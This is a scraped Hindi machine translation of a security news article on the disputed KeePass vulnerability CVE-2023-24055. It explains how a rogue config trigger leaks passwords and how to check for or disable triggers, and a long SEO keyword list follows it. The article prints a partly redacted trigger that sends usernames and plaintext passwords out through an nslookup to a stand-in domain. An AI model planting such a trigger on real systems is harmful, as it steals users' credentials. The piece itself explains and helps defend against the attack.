पासवर्ड प्रबंधकों के लिए पिछले कुछ सप्ताह समाचारपूर्ण रहे हैं - वे उपयोगी उपयोगिताएँ जो आपके द्वारा उपयोग की जाने वाली प्रत्येक वेबसाइट के लिए एक अलग पासवर्ड बनाने और फिर उन सभी पर नज़र रखने में आपकी सहायता करती हैं।
2022 के अंत में, लास्टपास की सभी खबरों में आने की बारी थी, जब कंपनी ने अंततः स्वीकार किया कि अगस्त 2022 में उसे जो उल्लंघन हुआ था, वह वास्तव में ग्राहकों के पासवर्ड के साथ समाप्त हुआ था। तिजोरियाँ चोरी हो रही हैं क्लाउड सेवा से जहां उनका बैकअप लिया गया था।
(पासवर्ड स्वयं चोरी नहीं हुए थे, क्योंकि वॉल्ट एन्क्रिप्टेड थे, और लास्टपास के पास बैकअप वॉल्ट फ़ाइलों के लिए किसी की "मास्टर कुंजी" की प्रतियां नहीं थीं, लेकिन अधिकांश लोगों को यह सुनकर खुशी हुई थी।)
फिर पूरी खबर में लाइफलॉक की बारी थी, जब कंपनी ने इस बारे में चेतावनी दी कि यह एक दाने की तरह लग रहा था पासवर्ड अनुमान लगाने वाले हमले, संभवतः कुछ समय पहले पूरी तरह से अलग वेबसाइट से चुराए गए पासवर्ड पर आधारित है, और शायद हाल ही में डार्क वेब पर खरीदा गया है।
लाइफलॉक का स्वयं उल्लंघन नहीं हुआ था, लेकिन इसके कुछ उपयोगकर्ताओं ने जोखिम के कारण पासवर्ड-साझाकरण व्यवहार के कारण ऐसा किया था, जिसे शायद उन्हें याद भी नहीं होगा।
प्रतिस्पर्धी 1पासवर्ड और बिटवार्डन भी हाल ही में Google द्वारा अनजाने में प्रसारित किए गए दुर्भावनापूर्ण विज्ञापनों की रिपोर्ट के आधार पर खबरों में रहे हैं, जो उपयोगकर्ताओं को उनके खाते के विवरण को फ़िशिंग करने के उद्देश्य से प्रतिकृति लॉगऑन पृष्ठों के लिए लुभाते थे।
अब KeePass की बारी है खबर में, इस बार एक और साइबर सुरक्षा मुद्दे के लिए: एक कथित भेद्यता, सॉफ़्टवेयर बग के लिए इस्तेमाल किया जाने वाला शब्दजाल शब्द जो साइबर सुरक्षा छेद की ओर ले जाता है जिसका हमलावर बुरे उद्देश्यों के लिए शोषण करने में सक्षम हो सकते हैं।
पासवर्ड सूंघना आसान हो गया
हम इसे एक के रूप में संदर्भित कर रहे हैं भेद्यता यहाँ क्योंकि इसमें एक आधिकारिक बग पहचानकर्ता है, जो यूएस नेशनल इंस्टीट्यूट फॉर स्टैंडर्ड्स एंड टेक्नोलॉजी द्वारा जारी किया गया है।
बग को डब किया गया है CVE-2023-24055: जिस हमलावर के पास XML कॉन्फ़िगरेशन फ़ाइल तक लिखने की पहुंच है, वह निर्यात ट्रिगर जोड़कर क्लियरटेक्स्ट पासवर्ड प्राप्त कर सकता है।
दुर्भाग्यवश, क्लियरटेक्स्ट पासवर्ड प्राप्त करने में सक्षम होने का दावा सच है।
यदि मेरे पास आपकी तथाकथित फ़ाइलों सहित आपकी व्यक्तिगत फ़ाइलों तक लिखने की पहुंच है %APPDATA%
निर्देशिका, मैं आपके द्वारा पहले से अनुकूलित किसी भी KeePass सेटिंग्स को संशोधित करने के लिए, या यदि आपने जानबूझकर कुछ भी नहीं बदला है तो अनुकूलन जोड़ने के लिए कॉन्फ़िगरेशन अनुभाग में चुपचाप बदलाव कर सकता हूँ...
...और मैं आश्चर्यजनक रूप से आसानी से आपके प्लेनटेक्स्ट पासवर्ड चुरा सकता हूं, या तो थोक में, उदाहरण के लिए पूरे डेटाबेस को एक अनएन्क्रिप्टेड सीएसवी फ़ाइल के रूप में डंप करके, या जब आप उनका उपयोग करते हैं, उदाहरण के लिए एक "प्रोग्राम हुक" सेट करके जो हर बार आपके एक्सेस करने पर ट्रिगर हो जाता है डेटाबेस से पासवर्ड.
ध्यान दें कि मुझे इसकी आवश्यकता नहीं है प्रशासक विशेषाधिकार, क्योंकि मुझे वास्तविक इंस्टॉलेशन निर्देशिका के साथ खिलवाड़ करने की ज़रूरत नहीं है जहां KeePass ऐप संग्रहीत होता है, जो आम तौर पर नियमित उपयोगकर्ताओं के लिए सीमा से बाहर है
और मुझे किसी लॉक-डाउन वैश्विक कॉन्फ़िगरेशन सेटिंग तक पहुंच की आवश्यकता नहीं है।
दिलचस्प बात यह है कि जब आप अपने पासवर्ड का उपयोग करते हैं तो KeePass आपके पासवर्ड को सूंघने से रोकने के लिए अपने रास्ते से हट जाता है, जिसमें उन उपयोगकर्ताओं से भी विभिन्न एंटी-कीलॉगर ट्रिक्स को रोकने के लिए छेड़छाड़-सुरक्षा तकनीकों का उपयोग करना शामिल है जिनके पास पहले से ही sysadmin शक्तियां हैं।
लेकिन KeePass सॉफ़्टवेयर प्लेनटेक्स्ट पासवर्ड डेटा को कैप्चर करना भी आश्चर्यजनक रूप से आसान बनाता है, शायद उन तरीकों से जिन्हें आप गैर-प्रशासकों के लिए भी "बहुत आसान" मान सकते हैं।
इसे बनाने के लिए KeePass GUI का उपयोग करना एक मिनट का काम था ट्रिगर हर बार जब आप क्लिपबोर्ड में पासवर्ड कॉपी करते हैं तो ईवेंट चलाने के लिए, और उस ईवेंट को DNS लुकअप करने के लिए सेट करने के लिए जिसमें उपयोगकर्ता नाम और प्लेनटेक्स्ट पासवर्ड दोनों शामिल होते हैं:
फिर हम अपनी स्थानीय कॉन्फ़िगरेशन फ़ाइल से उस विकल्प के लिए बहुत स्पष्ट XML सेटिंग को सिस्टम पर किसी अन्य उपयोगकर्ता की कॉन्फ़िगरेशन फ़ाइल में कॉपी कर सकते हैं, जिसके बाद उन्हें भी DNS लुकअप के माध्यम से इंटरनेट पर उनके पासवर्ड लीक होते मिलेंगे।
भले ही XML कॉन्फ़िगरेशन डेटा काफी हद तक पढ़ने योग्य और जानकारीपूर्ण है, KeePass उत्सुकतापूर्वक यादृच्छिक डेटा स्ट्रिंग्स का उपयोग करता है जिन्हें GUIDs (संक्षेप में) के रूप में जाना जाता है विश्व स्तर पर अद्वितीय पहचानकर्ता) विभिन्न को निरूपित करने के लिए ट्रिगर सेटिंग्स, ताकि एक अच्छी तरह से सूचित उपयोगकर्ता को भी यह समझने के लिए एक व्यापक संदर्भ सूची की आवश्यकता होगी कि कौन से ट्रिगर सेट किए गए हैं, और कैसे।
हमारा डीएनएस-लीकिंग ट्रिगर इस तरह दिखता है, हालांकि हमने कुछ विवरणों को संशोधित कर दिया है ताकि आप सीधे इस पाठ को कॉपी-पेस्ट करके किसी भी तात्कालिक शरारत से बच सकें:
XXXXXXXXXXXXXXXXXX कॉपी DNS लुकअप के माध्यम से सामान चुराएं XXXXXXXXXXXXXXXXXXXX 0 XXXXXXXXXXXXXXXXXXXX nslookup XXXX.XXXX.blah.test सही 1
इस ट्रिगर के सक्रिय होने से, KeePass पासवर्ड तक पहुंचने से प्लेनटेक्स्ट एक विनीत DNS लुकअप में मेरी पसंद के डोमेन पर लीक हो जाता है, जो है blah.test
इस उदाहरण में।
ध्यान दें कि वास्तविक जीवन के हमलावर लगभग निश्चित रूप से चुराए गए पाठ को उलझा देंगे या अस्पष्ट कर देंगे, जिससे न केवल DNS लीक होने पर उसका पता लगाना कठिन हो जाएगा, बल्कि गैर-ASCII वर्णों वाले पासवर्ड का भी ध्यान रखना होगा, जैसे कि उच्चारण वाले अक्षर या इमोजी, अन्यथा DNS नामों में इसका उपयोग नहीं किया जा सकता:
लेकिन क्या यह सचमुच एक बग है?
हालाँकि, पेचीदा सवाल यह है, "क्या यह वास्तव में एक बग है, या यह सिर्फ एक शक्तिशाली सुविधा है जिसका दुरुपयोग किसी ऐसे व्यक्ति द्वारा किया जा सकता है जिसे पहले से ही आपकी निजी फ़ाइलों पर कम से कम उतना ही नियंत्रण की आवश्यकता होगी जितनी आपके पास है?"
सीधे शब्दों में कहें, तो क्या यह एक भेद्यता है यदि कोई व्यक्ति जिसके पास पहले से ही आपके खाते का नियंत्रण है, वह उन फ़ाइलों के साथ गड़बड़ी कर सकता है जिन तक आपका खाता वैसे भी पहुंच सकता है?
भले ही आप उम्मीद कर सकते हैं कि एक पासवर्ड प्रबंधक में छेड़छाड़-सुरक्षा की बहुत सारी अतिरिक्त परतें शामिल होंगी ताकि इस प्रकार की बग/सुविधाओं का दुरुपयोग करना कठिन हो जाए, लेकिन ऐसा करना चाहिए CVE-2023-24055 क्या यह वास्तव में सीवीई-सूचीबद्ध भेद्यता है?
यदि हां, तो ऐसा आदेश नहीं दिया जाएगा DEL
(फ़ाइल हटाएं) और FORMAT
"बग" भी होने चाहिए?
और PowerShell का अस्तित्व ही नहीं होगा, जो संभावित रूप से खतरनाक व्यवहार को भड़काना बहुत आसान बनाता है (कोशिश करें)। powerhsell get-clipboard
, उदाहरण के लिए), स्वयं में एक भेद्यता हो?
यह KeePass की स्थिति है, जिसे निम्नलिखित पाठ द्वारा स्वीकार किया गया है जिसे इसमें जोड़ा गया है "बग" विवरण एनआईएसटी की वेबसाइट पर:
** विवादित ** [...] नोट: विक्रेता की स्थिति यह है कि पासवर्ड डेटाबेस का उद्देश्य किसी ऐसे हमलावर के खिलाफ सुरक्षित होना नहीं है जिसके पास स्थानीय पीसी तक पहुंच का स्तर है।
क्या करना है?
यदि आप एक स्टैंडअलोन KeePass उपयोगकर्ता हैं, तो आप KeePass ऐप खोलकर और ऊपर बनाए गए "DNS स्टीलर" जैसे दुष्ट ट्रिगर्स की जांच कर सकते हैं। टूल्स > ट्रिगर... खिड़की:
ध्यान दें कि आप संपूर्ण को पलट सकते हैं ट्रिगर इस विंडो से सिस्टम को केवल अचयनित करके बंद करें [ ] Enable trigger system
विकल्प…
...लेकिन यह एक वैश्विक सेटिंग नहीं है, इसलिए इसे आपकी स्थानीय कॉन्फ़िगरेशन फ़ाइल के माध्यम से फिर से चालू किया जा सकता है, और इसलिए यह आपको केवल गलतियों से बचाता है, न कि आपके खाते तक पहुंच रखने वाले हमलावर से।
आप वैश्विक "लॉकडाउन" फ़ाइल को संशोधित करके, कंप्यूटर पर सभी के लिए विकल्प को बंद कर सकते हैं, उनके पास इसे स्वयं चालू करने का कोई विकल्प नहीं है। KeePass.config.enforced.XML
, उस निर्देशिका में पाया जाता है जहां ऐप प्रोग्राम स्वयं स्थापित है।
यदि आपकी वैश्विक XML प्रवर्तन फ़ाइल इस तरह दिखती है तो ट्रिगर्स को सभी के लिए बंद कर दिया जाएगा:
गलत
(यदि आप सोच रहे हैं, तो एक हमलावर जिसके पास इस परिवर्तन को उलटने के लिए एप्लिकेशन निर्देशिका तक लिखने की पहुंच है, उसके पास निश्चित रूप से KeePass निष्पादन योग्य फ़ाइल को संशोधित करने, या किसी भी तरह स्टैंडअलोन कीलॉगर को स्थापित करने और सक्रिय करने के लिए पर्याप्त सिस्टम-स्तरीय शक्ति होगी।)
यदि आप एक नेटवर्क प्रशासक हैं जिसे अपने उपयोगकर्ताओं के कंप्यूटर पर KeePass को लॉक करने का काम सौंपा गया है ताकि यह अभी भी उनकी मदद करने के लिए पर्याप्त लचीला हो, लेकिन गलती से साइबर अपराधियों की मदद करने के लिए पर्याप्त लचीला नहीं है, तो हम KeePass को पढ़ने की सलाह देते हैं सुरक्षा मुद्दे पेज, द ट्रिगर्स पृष्ठ, और लागू कॉन्फ़िगरेशन इस पृष्ठ पर ज़ूम कई वीडियो ट्यूटोरियल और अन्य साहायक साधन प्रदान करता है।
- एसईओ संचालित सामग्री और पीआर वितरण। आज ही प्रवर्धित हो जाओ।
- प्लेटोब्लॉकचैन। Web3 मेटावर्स इंटेलिजेंस। ज्ञान प्रवर्धित। यहां पहुंचें।
- स्रोत: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- योग्य
- About
- ऊपर
- पूर्ण
- पहुँच
- तक पहुँचने
- लेखा
- सक्रिय
- जोड़ा
- स्वीकार किया
- विज्ञापन
- बाद
- के खिलाफ
- सब
- ने आरोप लगाया
- पहले ही
- और
- अन्य
- अनुप्रयोग
- आवेदन
- अगस्त
- लेखक
- स्वत:
- वापस
- अस्तरवाला
- पृष्ठभूमि छवि
- बैकअप
- आधारित
- क्योंकि
- जा रहा है
- सीमा
- तल
- भंग
- दोष
- कीड़े
- कब्जा
- कौन
- मामला
- के कारण होता
- का कारण बनता है
- केंद्र
- निश्चित रूप से
- परिवर्तन
- अक्षर
- चेक
- चुनाव
- दावा
- करीब
- बादल
- रंग
- कैसे
- कंपनी
- पूरी तरह से
- कंप्यूटर
- कंप्यूटर्स
- स्थितियां
- विन्यास
- विचार करना
- नियंत्रण
- प्रतियां
- सका
- आवरण
- बनाना
- बनाया
- सीवीई
- साइबर अपराधी
- साइबर सुरक्षा
- खतरनाक
- अंधेरा
- डार्क वेब
- तिथि
- डाटाबेस
- विवरण
- डीआईडी
- विभिन्न
- सीधे
- डिस्प्ले
- DNS
- डोमेन
- dont
- नीचे
- करार दिया
- आसान
- आसानी
- भी
- एन्क्रिप्टेड
- प्रवर्तन
- पर्याप्त
- संपूर्ण
- और भी
- कार्यक्रम
- प्रत्येक
- हर कोई
- उदाहरण
- शोषण करना
- निर्यात
- व्यापक
- अतिरिक्त
- Feature
- कुछ
- पट्टिका
- फ़ाइलें
- अंत में
- खोज
- लचीला
- निम्नलिखित
- सेना
- पाया
- से
- मिल
- मिल रहा
- वैश्विक
- चला जाता है
- गूगल
- सुविधाजनक
- खुश
- होने
- ऊंचाई
- मदद
- यहाँ उत्पन्न करें
- छेद
- आशा
- मंडराना
- कैसे
- तथापि
- एचटीएमएल
- HTTPS
- पहचानकर्ता
- तत्काल
- in
- शामिल
- शामिल
- सहित
- जानकारीपूर्ण
- स्थापित
- उदाहरण
- संस्थान
- इंटरनेट
- मुद्दा
- जारी किए गए
- IT
- खुद
- शब्दजाल
- रखना
- जानने वाला
- बड़े पैमाने पर
- LastPass
- परतों
- नेतृत्व
- रिसाव
- लीक
- स्तर
- सूची
- स्थानीय
- देखा
- लग रहा है
- लुकअप
- बनाया गया
- बनाना
- बनाता है
- प्रबंधक
- प्रबंधक
- हाशिया
- अधिकतम-चौड़ाई
- हो सकता है
- गलती
- गलतियां
- संशोधित
- अधिकांश
- नामों
- राष्ट्रीय
- आवश्यकता
- नेटवर्क
- समाचार
- NIST
- साधारण
- प्राप्त
- सरकारी
- उद्घाटन
- विकल्प
- अन्यथा
- अपना
- प्राचल
- पासवर्ड
- पासवर्ड
- पॉल
- PC
- स्टाफ़
- शायद
- स्टाफ़
- फ़िशिंग
- सादे पाठ
- प्लेटो
- प्लेटो डेटा इंटेलिजेंस
- प्लेटोडाटा
- स्थिति
- पोस्ट
- संभावित
- बिजली
- शक्तिशाली
- शक्तियां
- PowerShell का
- निजी
- विशेषाधिकारों
- शायद
- कार्यक्रम
- खरीदा
- प्रयोजनों
- रखना
- प्रश्न
- बिना सोचे समझे
- दुस्साहसी
- पढ़ना
- हाल ही में
- की सिफारिश
- नियमित
- याद
- उत्तर
- की सूचना दी
- रिपोर्ट
- उल्टा
- जोखिम
- रन
- अनुभाग
- सुरक्षित
- भावना
- सेवा
- सेट
- की स्थापना
- सेटिंग्स
- कम
- चाहिए
- केवल
- So
- सॉफ्टवेयर
- ठोस
- कुछ
- कोई
- Spot
- स्टैंडअलोन
- मानकों
- फिर भी
- चुराया
- रुकें
- संग्रहित
- ऐसा
- माना
- एसवीजी
- प्रणाली
- लेना
- तकनीक
- टेक्नोलॉजी
- RSI
- लेकिन हाल ही
- अपने
- इसलिये
- यहाँ
- पहर
- सेवा मेरे
- भी
- ऊपर का
- ट्रैक
- संक्रमण
- पारदर्शी
- ट्रिगर
- <strong>उद्देश्य</strong>
- मोड़
- बदल गया
- आम तौर पर
- अद्वितीय
- यूआरएल
- us
- उपयोग
- उपयोगकर्ता
- उपयोगकर्ताओं
- उपयोगिताओं
- विभिन्न
- मेहराब
- वाल्टों
- के माध्यम से
- भेद्यता
- W3
- तरीके
- वेब
- वेबसाइट
- सप्ताह
- क्या
- कौन कौन से
- कौन
- मर्जी
- सोच
- काम
- होगा
- लिखना
- एक्सएमएल
- आपका
- स्वयं
- जेफिरनेट